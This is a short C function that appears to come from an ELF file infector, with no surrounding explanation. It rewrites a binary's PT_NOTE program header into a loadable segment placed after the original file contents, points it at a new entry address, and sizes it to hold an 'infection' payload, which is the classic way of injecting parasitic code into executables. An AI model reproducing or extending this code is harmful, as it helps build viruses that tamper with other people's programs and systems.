bool target_patch_phdr(Target* t)
{
  Elf32_Phdr* note = t->phdr + 5;
  if (note->p_type != PT_NOTE)
    return false;

  note->p_type = PT_LOAD;
  /* align up multiple of 16 */
  note->p_offset = t->aligned_filesize;
  note->p_vaddr =
  note->p_paddr = target_new_entry_addr(t);
  note->p_filesz =
  note->p_memsz = sizeof(infection);
  note->p_flags = t->phdr[2].p_flags;
  note->p_align = t->phdr[2].p_align;
  return true;
}
